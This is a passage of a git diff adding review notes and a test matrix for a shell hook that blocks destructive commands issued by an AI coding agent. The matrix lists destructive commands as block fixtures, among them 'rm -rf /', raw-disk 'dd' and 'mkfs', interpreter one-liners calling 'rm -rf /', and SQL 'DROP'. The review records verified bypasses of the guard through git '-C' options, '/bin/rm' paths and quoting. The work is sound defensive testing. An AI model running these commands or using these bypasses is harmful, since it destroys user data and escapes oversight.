+| parity-safety-net-rules SKILL renumbering 14→15 built-ins | **Traceable to Fix 4** (new guard must appear in the human-facing list) | Quality Suggestion 4 notes the numbering-scheme skew widening — follow-up material |
+| Guard-harness extension (`makeRebaseRepo`, +152 lines in `safety-net-guard-harness.ts`) | **Traceable test infrastructure** for R3 fixtures | Standard |
+
+Nothing untraceable found: every changed file maps to a scoped fix, a review finding, or a repo gate.
+
+## Spec adequacy
+
+Adequate. The issue carries repro observation, impact, and an enumerated fix menu; the plan
+adds an effective completion condition with negative-control floor ("zero weakening for
+branch-authored commits") and explicit proofs. No DIVERGES-for-inadequate-spec trigger.
+
+## Boundary notes
+
+- No v2 verdict for #1956 exists → no cited-evidence boundaries to cross-check; no
+  `BOUNDARY_MISMATCH` rows exist or were invented. The stale #1960 verdict was identified
+  by artifact identity (`issue`, `branch`, `head_sha`) and excluded.
+- All evidence cited above is at the `cli`/diff/test boundary from the quality and security
+  review artifacts (both ran commands empirically) plus commit-content inspection by me.
+
+## Remaining to reach CONFORMS
+
+1. Verifier writes `.lisa/verification-status.json` (v2) for #1956 at head `0e0b565…`:
+   full `bun run test` green, plan proofs 2–3 (live scratch-repo lanes), Not-established review.
+2. T6 creates the PR with the Fix-2 rejected-alternative record in the body.

--- a/.lisa/spec-conformance-1960.md
+++ b/.lisa/spec-conformance-1960.md
@@ -1,0 +1,66 @@
+# Spec Conformance — CodySwannGT/lisa#1960
+
+**Spec source:** GitHub issue CodySwannGT/lisa#1960 ("safety-net double-screening: retire upstream safety-net plugin after Lisa hook reaches guard parity with 1.0.6")
+**Shipped work:** branch `feat/1960-safety-net-guard-parity`, commits `f02715fa7` (guard absorption) → `eeb8f8faf` (retirement) → `8ab54c7e6` (review-fix wave)
+**Reviewer:** spec-conformance-specialist · 2026-07-22
+**Self-review disclosure:** this agent did NOT produce the implementation.
+
+## Verification-verdict availability (degradation notice)
+
+`.lisa/verification-status.json` exists but belongs to issue **#1546** (2026-07-18) — there is **no v2 verification verdict for #1960**. Per the degrade-never-block rule, rows whose proof depends on a captured runtime observation are capped at `PARTIAL` where no independent run is recorded; no boundary mismatch is invented. Empirical evidence that does exist:
+
+- Quality review (`.lisa/quality-review-1960.md`) empirically ran the suites at `f02715fa7`+`eeb8f8faf`: guard matrix **138/138 pass**, regression floor **53/53 pass**, all 10 settings flips confirmed, fan-out byte-identical.
+- Security review (`.lisa/security-review-1960.md`) empirically drove both the upstream 1.0.6 engine (`explain` CLI) and the Lisa hook with live PreToolUse payloads.
+- Drift detector run by this reviewer on this branch (team-lead-sanctioned, read-only): **exit 0, 0 of 5 synced skills drifted**, safety-net pinned 1.0.6 = current 1.0.6.
+- **Gap:** the post-`8ab54c7e6` state (173-fixture matrix) has no independently captured test run — only the commit message's claim ("every bypass was empirically driven through the old and new hook"). Fixtures for every claimed fix are present in the tree (verified below), but no verification-specialist run pins them green.
+
+## Coverage matrix
+
+| # | Requirement (from issue AC) | Boundary | Evidence | Status |
+|---|---|---|---|---|
+| AC1.a | Guards reviewed against upstream 1.0.6's protection set | artifact-review | `.lisa/research-1960-guard-audit.md` (134 lines): master classification table over upstream default-mode guards #1–20+, each verdict empirically verified via upstream `explain` CLI AND live Lisa hook runs; module-level source refs into the 1.0.6 bundle | **MATCH** |
+| AC1.b | Material guards absorbed | code + test-run-log | `f02715fa7` reimplements every `material-absorb` row (git discard family: checkout `--`/`-f`/`--pathspec-from-file`/bare `.`, switch discard, restore worktree, stash drop/clear, clean force, branch -D, tag -d, reflog delete, worktree remove --force, reset --merge; rm hardening; find/xargs; disk destroyers; fail-closed parse). Quality review ran 138/138 green at this commit. Deliberate skips (reset --hard clean-tree, feature-branch force-push, rebase --abort) documented in audit with rationale | **MATCH** |
+| AC1.c | Allow/block fixture tests driven through the real hook | test-run-log | `tests/unit/hooks/parity-safety-net-guards.test.ts` + `tests/helpers/safety-net-guard-fixtures.ts`: harness spawns a **bash subprocess of the actual hook** with PreToolUse JSON on stdin, asserts exit codes (2=block, 0=allow) — not regex unit-checks. Paired block + near-miss-allow rows per guard (152 fx + 10 gfx + individual tests ≈ 173). 138/138 empirically green pre-8ab54; **post-8ab54 run not independently captured** | **PARTIAL** (evidence gap only — content conforms; capped per absent v2 verdict) |
+| AC2.a | Remove `safety-net@cc-marketplace` from `install-claude-plugins.sh` with version-gated uninstall | code + test-run-log | `eeb8f8faf` diff: removed from curated install list; added to existing `FORCE_PLUGIN_SYNC` retirement loop alongside sentry (same #1955 mechanism). `install-claude-plugins-self.test.ts` pins uninstall-on-full-sync AND no-uninstall-on-same-version (mirroring sentry's assertions); quality review ran regression floor 53/53 green | **MATCH** |
+| AC2.b | Flip `enabledPlugins` entries to `false` | code | All **10** settings templates verified in working tree: `"safety-net@cc-marketplace": false` in `.claude`, `.claude-pr`, `all`, `cdk`, `expo`, `harper-fabric`, `nestjs`, `phaser`, `rails`, `typescript`; independently confirmed by quality review | **MATCH** |
+| AC2.c | Update routing artifact + parity skill note | code | `parity/plugin-routing/safety-net@cc-marketplace.json`: upstreamVersion 0.9.0→**1.0.6**, analyzedAt 2026-07-22, status `approved` (S5 fix). `.md`: "Addendum — 2026-07-22 re-review at upstream 1.0.6" recording retirement decision + guard absorption. `SKILL.md`: `synced-from: safety-net@cc-marketplace@1.0.6`, pin note, `prod` in protected set + refspec-divergence note (S3 fix); byte-consistent across all fan-out copies (quality review) | **MATCH** |
+| AC3 | Pre-push parity gate (#1955) stays green | drift-detector run | Ran `node scripts/plugin-parity-drift.mjs` on this branch: **exit 0**, `0 of 5 synced skills drifted`, safety-net row `1.0.6 / 1.0.6 / ok`. Gate is wired in `.husky/pre-push.local:19` | **MATCH** |
+| Ordering | Parity absorption precedes retirement | commit graph | `f02715fa7` (absorb) is the parent of `eeb8f8faf` (retire); the retirement commit message explicitly conditions on "guards absorbed … previous commit". Issue's "never weaken the net" ordering honored | **MATCH** |
+
+## Review must-fix resolution (cross-check vs `8ab54c7e6`)
+
+| Finding | Severity | Resolution evidence in tree |
+|---|---|---|
+| Sec **F1** — git global-option (`-C`/`-c`/`--git-dir`…) bypasses every git guard | HIGH / must-fix | `parity-safety-net.sh:164` shared `GIT_CMD` anchor consuming `GIT_GLOBAL_OPTS`, applied to push/reset/checkout/switch/etc. Fixtures GO-B1–B13 block every reproducer row from the security review's table (incl. `-c`, `--git-dir=`, space-form `--git-dir`); GO-A1–A6 pin near-misses allowed (`-C … checkout -b`, `-C … status`, `--force-with-lease`, feature-branch force-push); GS-B4/GS-A6 cover `git -C . reset --hard` dirty/clean |
+| Sec **F2** — path-prefixed rm (`/bin/rm`, `./rm`) bypasses rm guards | HIGH / must-fix | Hook rm matcher now accepts basename-exactly-`rm` paths (L165–166, L229 comments + implementation); fixtures PR-B1–B6 block (`/usr/bin/rm -rf ~`, `/bin/rm -rf /etc`, `../other`), PR-A1 allows `/bin/rm file.txt` |
+| Qual **W1** — tilde-spelled out-of-project rm | should-fix | Fixture RH-B6 `rm -rf ~/other-project` BLOCK; commit adds home-anchored `~/` targets to the rm target walk |
+| Qual **S1** — cross-statement false positive (`rm -rf build && cd /`) | suggestion | Fixture RG-RM-A5 `rm -rf build && cd /` ALLOW; per-statement catastrophic-target scan |
+| Qual **S3** — docs omit `prod` / refspec note | suggestion | SKILL.md L66–69: `prod` listed; refspec force-push divergence documented |
+| Qual **S4** — stale guard numbers in test comments | suggestion | Commit diff touches the test comment (SQL=13, custom=14) |
+| Qual **S5** — routing artifact status `proposed` | suggestion | JSON status now `approved` |
+| Qual **S2** — pre-existing full-path rm bypass | noted pre-existing | Subsumed by the F2 fix |
+
+The security review's dimension-5 verdict ("retirement completeness FAIL — coupled to F1/F2") is thereby cured: the retirement's premise ("material 1.0.6 guards absorbed") holds once F1/F2 are closed, and `8ab54c7e6` closes them.
+
+## Scope creep vs in-spirit classification
+
+| Change | Classification | Rationale |
+|---|---|---|
+| F1/F2 bypass fixes + fixtures (`8ab54c7e6`) | **In-spirit-of-AC1** (required, not creep) | The security review proved upstream 1.0.6 blocks these forms; without the fixes AC1 ("material guards absorbed") is unmet and the retirement premise fails. This IS the spec. |
+| W1 tilde hardening, S1 false-positive fix | **In-spirit-of-AC1** | W1 closes an out-of-project delete spelling (parity substance); S1 is anti-overblocking on an absorbed guard — both within the guard-parity mandate. |
+| Blocking bare `git checkout .` (exceeds upstream, which allows single-positional) | **In-spec** | The issue body names `git checkout -- <path>` variants; audit row #5 records the deliberate exceed with rationale; "never weaken the net" permits exceeding, forbids weakening. |
+| Fail-closed input handling (parse errors → exit 2) | **In-spirit, minor extension** | Not an enumerated AC, but hardens the same hook the spec targets; surfaced for human awareness, no Out-of-Scope section exists to violate. |
+| Docs/comment fixes (S3/S4/S5), upstream-evidence-manifest regeneration | **Traceable housekeeping** | Manifest regen is mandated by repo CI for template edits; doc fixes are review-driven. Not creep. |
+| Untracked `.lisa/*.md` artifacts, `.playwright-mcp/` | **Not shipped** | Uncommitted working-tree debris; not part of the branch diff. |
+
+**No `SCOPE_CREEP_VIOLATION`:** the issue has no explicit Out of Scope section; its Context note ("other curated overlaps … don't need this treatment") was respected — no changes touch code-simplifier/coderabbit/skill-creator install entries beyond leaving them in place.
+
+## Spec-adequacy note
+
+The issue carries three concrete, testable ACs plus an ordering constraint — adequate. It lacks a formal Validation Journey, mitigated in practice by the empirical security/quality reviews and the fixture matrix.
+
+## Verdict: **PARTIAL** (conforms on content; one evidence gap)
+
+Every AC element maps to concrete shipped work, ordering is honored, must-fix review items are demonstrably resolved in the tree, and there is no scope creep. The single gap is evidentiary, not substantive: **no v2 verification verdict exists for #1960**, and the final 173-fixture matrix at `8ab54c7e6` has no independently captured green run (the last captured run — 138/138 + 53/53 — predates the review-fix commit).
+
+**To upgrade to CONFORMS:** have verification-specialist (or CI) run `bunx vitest run tests/unit/hooks/parity-safety-net-guards.test.ts` plus the regression floor at `8ab54c7e6` and capture the result (ideally as a #1960 v2 verdict in `.lisa/verification-status.json`). Nothing else is outstanding.

--- a/.lisa/test-matrix-1960.md
+++ b/.lisa/test-matrix-1960.md
@@ -1,0 +1,776 @@
+# Test matrix + draft suite — safety-net guard parity (#1960, task T2)
+
+Plan: safety-net-guard-parity. Input: `.lisa/research-1960-guard-audit.md` (T1 audit) and
+`plugins/src/base/hooks/parity-safety-net.sh`. Read-only w.r.t. tracked files — this doc is the
+deliverable; the builder lands the real test file on a fresh branch.
+
+## Conventions discovered (existing hook tests)
+
+- Hook tests already exist: `tests/unit/hooks/parity-safety-net.test.ts` (force-push +
+  heredoc-prose, ~40 assertions) and `tests/unit/hooks/parity-safety-net-heredoc.test.ts`
+  (heredoc grammar). **Do not overwrite them** (test-assertion-preservation rule).
+- Runner: **vitest with globals** (`bun run test` → `vitest run`; bare `describe/it/expect`, no
+  imports of vitest).
+- Subprocess convention in both existing hook suites: **`spawnSync` from `node:child_process`**
+  with `input:` = PreToolUse JSON, asserting `.status`. NOT execFile+promisify — see deviations.
+- Hook path convention: tests resolve **`plugins/lisa/hooks/parity-safety-net.sh`** (the synced
+  plugin copy). It is byte-identical to the source `plugins/src/base/hooks/parity-safety-net.sh`;
+  the builder edits the source and must sync every fan-out copy (cursor/agy/copilot per
+  stack-per-agent fan-out) **and** regenerate the upstream-evidence manifest
+  (`bun run build:upstream-evidence-manifest`) in the same commit.
+- Temp-repo git calls must strip `GIT_*` env vars (hook-set `GIT_DIR`/`GIT_WORK_TREE` poison temp
+  repos — known repo learning) and pin `GIT_CONFIG_GLOBAL=/dev/null` so host config/hooksPath
+  can't leak in.
+- All "today" columns below were **empirically probed** in this session by piping fixture JSON to
+  the live hook from a temp cwd (probe scripts since removed), or verified in the T1 audit.
+
+## Verdict legend
+
+- expected **block** = hook must exit 2; **allow** = hook must exit 0.
+- today **green** = current hook already produces the expected verdict (regression pin);
+  **RED** = TDD-red until the corresponding absorb item lands.
+
+---
+
+## 1. Fixture matrix
+
+### A. git checkout discard family (absorb item 1)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| CO-B1 | `git checkout -- file.ts` | block | checkout-discard | canonical single-file discard | RED |
+| CO-B2 | `git checkout main -- src/app.ts` | block | checkout-discard | ref+pathspec form evades a naive `-- `-only regex | RED |
+| CO-B3 | `git checkout -f main` | block | checkout-discard | force checkout discards local edits | RED |
+| CO-B4 | `git checkout --force main` | block | checkout-discard | long-flag alias of CO-B3 | RED |
+| CO-B5 | `git checkout --pathspec-from-file=list.txt` | block | checkout-discard | file-driven discard, no `--` in command | RED |
+| CO-B6 | `git checkout .` | block | checkout-discard | whole-tree discard; named in #1960; **exceeds upstream** (upstream allows single positional) | RED |
+| CO-A1 | `git checkout -b feature` | allow | checkout-discard | branch creation must survive; `-b` is one char from `--` | green |
+| CO-A2 | `git checkout main` | allow | checkout-discard | plain branch switch is the everyday case | green |
+| CO-A3 | `git checkout -B hotfix` | allow | checkout-discard | force-*create-branch* is not a worktree discard | green |
+| CO-A4 | `git checkout feature-.dotted` | allow | checkout-discard | only bare `.` blocks — a `.` inside a ref name must not | green |
+| CO-A5 | `git log --oneline -- file.ts` | allow | checkout-discard | ` -- ` pathspec exists on many safe git verbs; guard must anchor on `checkout` | green |
+
+### B. git switch discard (absorb item 2)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| SW-B1 | `git switch --discard-changes main` | block | switch-discard | explicit discard flag | RED |
+| SW-B2 | `git switch -f main` | block | switch-discard | short force alias | RED |
+| SW-B3 | `git switch --force main` | block | switch-discard | long force alias | RED |
+| SW-A1 | `git switch main` | allow | switch-discard | plain switch refuses to overwrite by itself | green |
+| SW-A2 | `git switch -c new-branch` | allow | switch-discard | `-c` (create) is one char from `-f` in a careless class | green |
+
+### C. git restore (absorb item 3)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| RS-B1 | `git restore file.ts` | block | restore-worktree | default restore target IS the worktree — silent discard | RED |
+| RS-B2 | `git restore --worktree file.ts` | block | restore-worktree | explicit worktree flag | RED |
+| RS-B3 | `git restore --staged --worktree file.ts` | block | restore-worktree | `--staged` present but `--worktree` still discards — a "contains --staged → allow" shortcut is wrong | RED |
+| RS-B4 | `git restore .` | block | restore-worktree | whole-tree discard | RED |
+| RS-A1 | `git restore --staged file.ts` | allow | restore-worktree | unstaging is safe and REQUIRED for agent flows (needs two-condition bash check, not one ERE — audit note) | green |
+| RS-A2 | `git restore --staged .` | allow | restore-worktree | bulk unstage is safe; pairs with RS-B4 to prove the split is on flags, not pathspec | green |
+
+### D. git stash drop/clear (absorb item 4)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| ST-B1 | `git stash drop` | block | stash-destroy | drops newest stash | RED |
+| ST-B2 | `git stash drop 'stash@{0}'` | block | stash-destroy | arg'd form; braces/quotes must not break the match | RED |
+| ST-B3 | `git stash clear` | block | stash-destroy | wipes every stash | RED |
+| ST-A1 | `git stash push -m wip` | allow | stash-destroy | stashing is the SAFE alternative the reset guard recommends — must never block | green |
+| ST-A2 | `git stash pop` | allow | stash-destroy | pop restores work; only drop/clear destroy | green |
+| ST-A3 | `git stash list` | allow | stash-destroy | read-only subcommand | green |
+| ST-A4 | `git stash apply` | allow | stash-destroy | non-destructive restore | green |
+
+### E. git clean force (absorb item 5)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| CL-B1 | `git clean -f` | block | clean-force | canonical untracked-file wipe | RED |
+| CL-B2 | `git clean -fd` | block | clean-force | cluster with dirs | RED |
+| CL-B3 | `git clean -xfd` | block | clean-force | cluster with ignored files (worst case) | RED |
+| CL-B4 | `git clean --force` | block | clean-force | long flag | RED |
+| CL-A1 | `git clean -n` | allow | clean-force | dry run is the sanctioned preview (required tricky allow) | green |
+| CL-A2 | `git clean -nd` | allow | clean-force | dry-run cluster | green |
+| CL-A3 | `git clean --dry-run` | allow | clean-force | long dry-run | green |
+| CL-A4 | `git clean -fdn` | allow | clean-force | **design decision**: `-n` anywhere wins even with `-f` present (git itself performs no deletion) | green |
+
+### F. git branch force-delete (absorb item 6)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| BR-B1 | `git branch -D feature-x` | block | branch-force-delete | force delete loses unmerged commits | RED |
+| BR-B2 | `git branch -df old-branch` | block | branch-force-delete | `-d`+`-f` cluster ≡ `-D` | RED |
+| BR-B3 | `git branch -d -f old-branch` | block | branch-force-delete | split-flag form | RED |
+| BR-A1 | `git branch -d merged-branch` | allow | branch-force-delete | safe delete refuses unmerged work (required tricky allow) | green |
+| BR-A2 | `git branch -m old new` | allow | branch-force-delete | rename is non-destructive; `-m` must not be caught by a sloppy `-[dDf]` class | green |
+| BR-A3 | `git branch --delete merged-branch` | allow | branch-force-delete | long safe delete without `--force` | green |
+
+### G. tag / reflog / worktree (absorb item 8)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| TG-B1 | `git tag -d v1.0.0` | block | tag-delete | tags are shared refs | RED |
+| TG-B2 | `git reflog delete 'HEAD@{1}'` | block | reflog-delete | erases recovery history | RED |
+| TG-B3 | `git worktree remove --force wt` | block | worktree-force-remove | discards a dirty worktree | RED |
+| TG-A1 | `git tag v1.0.0` | allow | tag-delete | tag creation | green |
+| TG-A2 | `git tag -a v1.0.0 -m release` | allow | tag-delete | `-a`/`-d` are adjacent letters; annotated tag must pass | green |
+| TG-A3 | `git reflog` | allow | reflog-delete | read-only default subcommand | green |
+| TG-A4 | `git reflog expire --expire=now --all` | allow | reflog-delete | **parity decision**: upstream allows it too; documented residual risk (audit row 18) | green |
+| TG-A5 | `git worktree remove wt` | allow | worktree-force-remove | non-force remove refuses dirty worktrees itself | green |
+
+### H. rm target hardening (absorb item 9) — run with cwd = temp project, `CLAUDE_PROJECT_DIR` = same
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| RH-B1 | `rm -rf .` | block | rm-hardening | cwd self-delete; named in #1960 | RED |
+| RH-B2 | `rm -rf ./` | block | rm-hardening | slash variant of bare `.` | RED |
+| RH-B3 | `rm -rf ../sibling-project` | block | rm-hardening | `..` traversal escapes the project | RED |
+| RH-B4 | `rm -rf /Users/someone/other-project` | block | rm-hardening | absolute path outside project and outside tmp | RED |
+| RH-B5 | `rm -rf $DIR` | block | rm-hardening | unset/typo'd var can expand to anything | RED |
+| HM-B1 | `rm -rf projects` *(cwd = $HOME)* | block | rm-hardening | any recursive-force rm with cwd=$HOME is one arg from wiping home | RED |
+| RH-A1 | `rm -rf build` | allow | rm-hardening | in-project relative delete is the everyday agent action | green |
+| RH-A2 | `rm -rf ./build` | allow | rm-hardening | `./`-prefixed relative — must not be confused with bare `./` | green |
+| RH-A3 | `rm -rf ./node_modules` | allow | rm-hardening | required tricky allow; the highest-frequency legit rm | green |
+| RH-A4 | `rm -rf /tmp/scratch-dir` | allow | rm-hardening | temp allowance (required tricky allow) | green |
+| RH-A5 | `rm -rf "$TMPDIR/cache"` | allow | rm-hardening | `$TMPDIR`/`${TMPDIR}` is the sanctioned dynamic-target exception | green |
+| RH-A6 | `rm -rf __PROJECT_DIR__/dist` *(token → real temp project path)* | allow | rm-hardening | absolute path INSIDE the project must pass, proving the check is prefix-based not "any absolute" | green |
+| RH-A7 | `rm -rf .cache` | allow | rm-hardening | dot-prefixed relative dir must not match the bare-`.` rule | green |
+| HM-A1 | `rm -f notes.txt` *(cwd = $HOME)* | allow | rm-hardening | HOME gate applies only to recursive+force | green |
+
+### I. quote-aware boundaries — verified bypasses (absorb item 10 / F1) — **MUST-BLOCK**
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| QB-B1 | `bash -c "rm -rf /"` | block | quote-boundary (guard 1 fix) | verified live bypass: `/` adjacent to `"` defeats the target boundary | RED |
+| QB-B2 | `sh -c 'rm -rf ~'` | block | quote-boundary | single-quote variant | RED |
+| QB-B3 | `python -c "import os; os.system('rm -rf /')"` | block | quote-boundary | verified live bypass; interpreter one-liner | RED |
+| QB-B4 | `node -e "require('child_process').execSync('rm -rf /')"` | block | quote-boundary | node execSync variant | RED |
+| QB-B5 | `perl -e "system('rm -rf /')"` | block | quote-boundary | perl system variant | RED |
+| QB-B6 | `eval "rm -rf ~"` | block | quote-boundary | quoted eval — **exceeds upstream** (upstream misses it) | RED |
+| QB-A1 | `bash -c "rm -rf build"` | allow | quote-boundary | fix must widen the *boundary*, not the *target set* — safe target in quotes stays allowed | green |
+| QB-A2 | `python -c "print(1)"` | allow | quote-boundary | routine interpreter one-liner; blocking it breaks agents daily | green |
+| QB-A3 | `python spider.py -c config.yaml` | allow | quote-boundary | `-c` as a script's own flag, not a code arg | green |
+
+### J. find / xargs deletion (absorb item 11)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| FX-B1 | `find . -delete` | block | find-delete | tree-wide delete with no rm anywhere | RED |
+| FX-B2 | `find . -name '*.tmp' -delete` | block | find-delete | filtered form still deletes recursively | RED |
+| FX-B3 | `find . -name x -exec rm -rf {} \;` | block | find-exec-rm | `{}` target defeats guard 1's catastrophic-target gate (audit F5) | RED |
+| FX-B4 | `xargs rm -rf` | block | xargs-rm | targets come from dynamic stdin — unauditable | RED |
+| FX-B5 | `cat list.txt \| xargs rm -rf` | block | xargs-rm | piped file-driven form | RED |
+| FX-B6 | `find /tmp -type d -exec rm -fr {} +` | block | find-exec-rm | `-fr` cluster order + `+` terminator variant | RED |
+| FX-A1 | `find . -name x -print` | allow | find-delete | read-only find is constant agent traffic | green |
+| FX-A2 | `find /tmp -name x -exec rm {} +` | allow | find-exec-rm | plain `rm` (no recursive+force) on find results is a normal cleanup | green |
+| FX-A3 | `xargs grep pattern` | allow | xargs-rm | xargs with a non-destructive child | green |
+| FX-A4 | `find . -name pre-delete-backup -print` | allow | find-delete | `-delete` as a *substring of a name arg* must not match | green |
+| FX-A5 | `echo a.txt \| xargs rm -f` | allow | xargs-rm | force-but-not-recursive keeps single-file deletes usable | green |
+
+### K. disk destroyers (absorb item 12 — always-on, exceeds upstream placement)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| DD-B1 | `dd if=/dev/zero of=/dev/sda` | block | disk-destroyer | writes zeros over a raw device | RED |
+| DD-B2 | `mkfs.ext4 /dev/sda1` | block | disk-destroyer | formats a partition | RED |
+| DD-B3 | `mkfs /dev/sdb` | block | disk-destroyer | bare mkfs (no suffix) variant | RED |
+| DD-B4 | `shred -u secrets.txt` | block | disk-destroyer | unrecoverable overwrite (upstream DANGEROUS_PATTERNS parity) | RED |
+| DD-A1 | `dd if=disk.img of=backup.img` | allow | disk-destroyer | file-to-file dd is legitimate imaging | green |
+| DD-A2 | `dd if=/dev/zero of=./local.img` | allow | disk-destroyer | *reading* /dev is fine; only `of=/dev/...` destroys | green |
+| DD-A3 | `ls shredder/` | allow | disk-destroyer | `shred` prefix of a longer word — word boundary check | green |
+| DD-A4 | `mkfs.ext4 disk.img` | allow | disk-destroyer | mkfs onto an image file, not a device | green |
+
+### L. fail-closed input handling (absorb item 13)
+
+| id | input | expected | guard | why the near-miss matters | today |
+|----|-------|----------|-------|---------------------------|-------|
+| FC-B1 | stdin = `not json` | block (exit 2) | fail-closed | probed today: exits **5** — a non-2 exit is a NON-blocking hook error, so a parse failure currently fails **open** | RED |
+| FC-A1 | `{"tool_name":"Bash","tool_input":{}}` (no command) | allow | fail-closed | valid-but-empty input is a legit no-op, not a parse failure | green |
+| FC-A2 | tool_name `Read` with `rm -rf /` as text | allow | fail-closed | non-Bash tools must stay exempt after the trap lands | green |
+
+### M. Pre-existing built-in regressions (nothing may relax)
+
+#### M1. rm -rf root/home/wildcard (guard 1)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| RG-RM-B1 | `rm -rf /` | block | rm-root | canonical | green |
+| RG-RM-B2 | `rm -rf ~` | block | rm-root | home tilde | green |
+| RG-RM-B3 | `rm -rf $HOME` | block | rm-root | var form | green |
+| RG-RM-B4 | `rm -rf ${HOME}` | block | rm-root | braced var form | green |
+| RG-RM-B5 | `rm -rf /*` | block | rm-root | root glob | green |
+| RG-RM-B6 | `rm -rf *` | block | rm-root | bare wildcard — **Lisa is stricter than upstream here; keep** | green |
+| RG-RM-B7 | `rm -fr ~` | block | rm-root | reversed cluster | green |
+| RG-RM-B8 | `rm -r -f /` | block | rm-root | split flags | green |
+| RG-RM-B9 | `rm --recursive --force /` | block | rm-root | long flags (probed green) | green |
+| RG-RM-B10 | `sudo rm -rf /` | block | rm-root | wrapper prefix (probed green) | green |
+| RG-RM-B11 | `env FOO=1 rm -rf ~` | block | rm-root | env-assignment prefix | green |
+| RG-RM-A1 | `rm -r dir` | allow | rm-root | recursive without force | green |
+| RG-RM-A2 | `rm -f file.txt` | allow | rm-root | force without recursive | green |
+| RG-RM-A3 | `rm file.txt` | allow | rm-root | plain rm | green |
+| RG-RM-A4 | `rm -rf build && echo done` | allow | rm-root | safe target inside a chain | green |
+
+#### M2. protected-branch force-push (guard 2) — deep coverage stays in the EXISTING suite
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| RG-FP-B1 | `git push --force origin main` | block | force-push | canonical | green |
+| RG-FP-B2 | `git push -f origin master` | block | force-push | short flag + master | green |
+| RG-FP-A1 | `git push --force-with-lease origin main` | allow | force-push | required tricky allow — the sanctioned safe alternative; contains the literal substring `--force` | green |
+| RG-FP-A2 | `git push --force origin feature/experiment` | allow | force-push | **deliberate divergence from upstream** (audit row 11): feature-branch force-push is a sanctioned rebase workflow | green |
+| RG-FP-A3 | `git push origin main` | allow | force-push | non-force push to protected | green |
+
+#### M3. dirty-tree reset guards (guard 3 + absorb item 7) — temp git repo fixtures
+
+| id | repo state | command | expected | guard | why the near-miss matters | today |
+|----|-----------|---------|----------|-------|---------------------------|-------|
+| GS-B1 | dirty | `git reset --hard` | block | reset-dirty | canonical discard of uncommitted work | green |
+| GS-B2 | dirty | `git reset --hard HEAD~1` | block | reset-dirty | ref'd form | green |
+| GS-B3 | dirty | `git reset --merge` | block | reset-dirty (absorb 7) | `--merge` discards like `--hard`; same dirty-tree condition | RED |
+| GS-A1 | clean | `git reset --hard` | allow | reset-dirty | **pins the deliberate divergence**: clean-tree resets are a legit workflow (audit row 8; residual risk F3 documented, not tested) | green |
+| GS-A2 | clean | `git reset --merge` | allow | reset-dirty | new `--merge` arm must inherit the same dirty-only condition | green |
+| GS-A3 | dirty | `git reset --soft HEAD~1` | allow | reset-dirty | soft reset preserves the worktree | green |
+| GS-A4 | dirty | `git reset --keep` | allow | reset-dirty | `--keep` aborts rather than discard | green |
+| GS-A5 | dirty | `git reset --mixed HEAD` | allow | reset-dirty | mixed reset unstages but keeps edits | green |
+
+#### M4. destructive SQL (guard 4 — Lisa-only value)
+
+| id | command | expected | guard | why the near-miss matters | today |
+|----|---------|----------|-------|---------------------------|-------|
+| RG-SQL-B1 | `psql -c 'DROP TABLE users;'` | block | sql | canonical | green |
+| RG-SQL-B2 | `mysql -e 'TRUNCATE sessions'` | block | sql | truncate without TABLE keyword | green |
+| RG-SQL-B3 | `echo 'DROP DATABASE prod' \| psql` | block | sql | piped SQL | green |
+| RG-SQL-B4 | `psql -c 'DROP SCHEMA public CASCADE'` | block | sql | schema form | green |
+| RG-SQL-B5 | `psql -c 'TRUNCATE TABLE audit_log'` | block | sql | TRUNCATE TABLE form | green |
+| RG-SQL-A1 | `truncate -s 0 file.log` | allow | sql | **coreutils `truncate`** — probed allow today (flag `-s` breaks the identifier match); pin it so an SQL-guard tweak never blocks log truncation | green |
+| RG-SQL-A2 | `echo drop tables gently` | allow | sql | plural `tables` defeats the word boundary — prose stays allowed (probed) | green |
+| RG-SQL-A3 | `git branch -d drop-table-migration` | allow | sql | hyphenated identifier is not SQL; also exercises safe branch delete | green |
+
+#### M5. custom ERE rules file (guard 5)
+
+| id | rules-file content | command | expected | why | today |
+|----|--------------------|---------|----------|-----|-------|
+| CR-B1 | `terraform[[:space:]]+destroy` | `terraform destroy -auto-approve` | block | operator-extensible rules keep working | green |
+| CR-A1 | same | `terraform plan` | allow | rule specificity respected | green |
+| CR-B2 | `# comment` + blank line + `FORBIDDEN_TOKEN` | `echo FORBIDDEN_TOKEN` | block | comments/blank lines skipped, later rules still active | green |
+| CR-A2 | same | `echo safe output` | allow | non-matching command passes | green |
+
+#### M6. heredoc classifier (deep coverage stays in the two EXISTING suites) — smoke only
+
+| id | command | expected | why | today |
+|----|---------|----------|-----|-------|
+| HD-A1 | `gh issue create --body-file - <<'EOF'` + `rm -rf /` + `EOF` | allow | gh-writer prose exemption must survive the F1 quote fix (payload is stripped *before* guards) | green |
+| HD-B1 | `bash <<'EOF'` + `rm -rf /` + `EOF` | block | executable heredoc stays visible to guards | green |
+
+### N. Documented accepted false-positives — **NOT asserted in the suite**
+
+Grep hooks cannot replicate upstream's engine-only `DISPLAY_COMMANDS` exemption (audit item 10
+note). These rows are documentation, not fixtures — either verdict is acceptable and the builder
+must not "fix" them at the cost of any MUST-BLOCK row:
+
+| command | today | note |
+|---------|-------|------|
+| `echo "docs about rm -rf / here"` | already blocked | space-bounded FP predates F1 (probed this session); workaround = quote-breaking or gh-writer heredoc |
+| `git commit -m "docs: explain git stash drop"` | will block once item 4 lands | workaround = `git commit -F <file>` (same remediation the heredoc block teaches) |
+
+---
+
+## 2. Draft vitest suite
+
